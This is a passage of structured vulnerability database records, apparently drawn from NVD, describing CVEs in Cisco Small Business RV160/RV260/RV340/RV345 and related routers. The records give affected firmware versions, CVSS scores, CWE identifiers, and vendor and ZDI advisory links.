               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 8.1,
               baseSeverity: "HIGH",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.2,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-02-10T18:15:09.360",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-418/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-418/",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-121",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-787",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-08-10 09:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DC1EBF8C-DC2F-422A-BB5A-8EBA8F68C10D",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC2F28CC-7FD9-4CAE-86C5-E86C0874561B",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2093B7CE-9902-4D0B-BC86-8582DEACF696",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9B1CF205-B0AB-40C7-BA28-BF458CCC9EAF",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E045BFA8-1EED-4793-A2A9-46D4B68BD685",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "21586C44-B44A-44DB-81C2-E12A750A7840",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CC3876E6-885E-4AC7-A04F-DF91CEDF0385",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "185E81E5-49D7-49CC-ABCB-C9ECF612A6E2",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3BAA3B86-EE3C-45BD-ACC6-64742DFB71E9",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Varias vulnerabilidades en los routers Cisco Small Business de las series RV160, RV260, RV340 y RV345 podrían permitir a un atacante remoto no autenticado ejecutar código arbitrario o causar una denegación de servicio (DoS) en un dispositivo afectado. Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20827",
   lastModified: "2024-11-21T06:43:38.243",
   metrics: {
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.2,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-08-10T09:15:08.537",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-120",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-78",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-02-10 18:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C925382-A223-4342-83D2-53B3071F9B45",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDD6C848-8EF9-410A-B899-02F0E03EB653",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE4C000C-89AB-4255-8D2B-4520BCB90490",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EA14E0B-442A-467D-92FF-369AD3A1A294",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D9FCD7-3DB5-413E-B504-8658A2D38EB7",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C2C2D2-9466-4A3F-A96C-166E32742C6C",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A21C17DD-A010-4744-9E06-DB845C5A1F00",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "428E4FFE-60EA-4BC1-BF13-FE50F5B093C0",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ED00C268-23EB-4743-8EF1-EEA2BE8A7566",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business RV160, RV260, RV340 y RV345 Series podrían permitir a un atacante realizar cualquiera de las siguientes acciones Ejecutar código arbitrario. Elevar los privilegios. Ejecutar comandos arbitrarios. Omitir las protecciones de autenticación y autorización. Obtener y ejecutar software no firmado. Causar una denegación de servicio (DoS) Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20702",
   lastModified: "2024-11-21T06:43:21.797",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "SINGLE",
               availabilityImpact: "COMPLETE",
               baseScore: 9,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 8,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.2,
               baseSeverity: "HIGH",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "HIGH",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 1.2,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-02-10T18:15:09.137",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-420/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-420/",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-121",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-787",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2021-04-08 04:15
Modified
2024-11-21 05:44
Summary
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "8C12141B-531E-44A5-AD79-16504B31D384",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F5759C3B-CE24-47A4-8513-A2C24028973E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "5CB50517-FD1B-4207-B63B-4E33F7654E2E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv132w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8511C48D-9EA6-4521-988C-61E1035BEFA1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "2835C440-025B-414F-BED1-5DA20431E726",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "C1E2F2A9-4118-4778-94AB-C996A6F56F0F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "62CC81E5-DA22-47A1-9D02-00A86DED8D96",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv134w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "39710CC4-1891-4E4B-AF65-AC2577CC8FFC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BAA1FCAC-F214-46F5-B2D7-751B24865236",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF13C864-9853-453C-B495-6C642DE9CB69",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA85E0EA-C194-4683-BA09-7C68080924E0",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F75F5D34-CED9-4390-AC75-7F592175DD67",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "79A57FFD-BA26-4F6E-B45F-2DF212908843",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "95130A28-C573-4BDF-ABDB-45EE96E94406",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "9AA93AAF-F894-44AE-98D6-DBF868AC4EBB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "EEE01B7F-692D-405D-938D-35E83C62D8F2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "FEA38FA6-CACA-4553-853C-E36D6395C3E4",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "9A035A4A-B82A-4F0B-8D38-4DD280037C11",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD084D1A-A03D-4854-9727-76C1FBC1A265",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "BDA8B5D4-821E-48CB-81EA-943BD1039087",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "F84DC383-4F05-4294-9008-B5223353526D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "A5DC3490-6E60-4806-874D-E23572DEAF35",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "9FED3BFB-7AA7-4A49-B911-58D7CBE8D704",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "EFC9C7EC-388E-476D-A444-EE9BEE3FD578",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "41A8558B-85AC-442A-9E3E-27EC127C5B33",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD473F62-964C-4D15-B0B6-D9D4AB8E2C1B",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
